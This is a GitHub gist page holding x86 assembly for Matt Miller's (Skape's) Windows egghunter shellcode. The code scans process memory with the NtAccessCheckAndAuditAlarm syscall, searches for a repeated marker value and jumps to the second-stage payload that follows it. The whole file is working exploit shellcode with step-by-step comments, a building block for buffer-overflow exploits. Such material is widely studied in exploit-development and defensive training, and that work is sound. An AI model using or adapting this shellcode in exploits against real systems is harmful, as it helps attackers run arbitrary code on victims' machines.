Last active
February 12, 2019 20:14
-
-
Save notsoshant/cfaedd873e08d030d4646ab32189814c to your computer and use it in GitHub Desktop.
Egghunter that uses NtAccessCheckAndAuditAlarm. Thanks to Skape (http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Author: Matt Miller (@epakskape) | |
| // Taken from http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
| entry: | |
| // You could put an xor edx, edx here to make the search somewhat | |
| // quicker, but given page aligned searching, it really isn't that bad | |
| // to omit it, and it saves two bytes. | |
| loop_inc_page: | |
| or dx, 0x0fff // Add PAGE_SIZE-1 to edx | |
| loop_inc_one: | |
| inc edx // Increment our pointer by one | |
| loop_check: | |
| push edx // Save edx | |
| push 0x2 // Push NtAccessCheckAndAuditAlarm | |
| pop eax // Pop into eax | |
| int 0x2e // Perform the syscall | |
| cmp al, 0x05 // Did we get 0xc0000005 (ACCESS_VIOLATION) ? | |
| pop edx // Restore edx | |
| loop_check_8_valid: | |
| je loop_inc_page // Yes, invalid ptr, go to the next page | |
| is_egg: | |
| mov eax, 0x50905090 // Throw our egg in eax | |
| mov edi, edx // Set edi to the pointer we validated | |
| scasd // Compare the dword in edi to eax | |
| jnz loop_inc_one // No match? Increment the pointer by one | |
| scasd // Compare the dword in edi to eax again (which is now edx + 4) | |
| jnz loop_inc_one // No match? Increment the pointer by one | |
| matched: | |
| jmp edi // Found the egg. Jump 8 bytes past it into our code. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment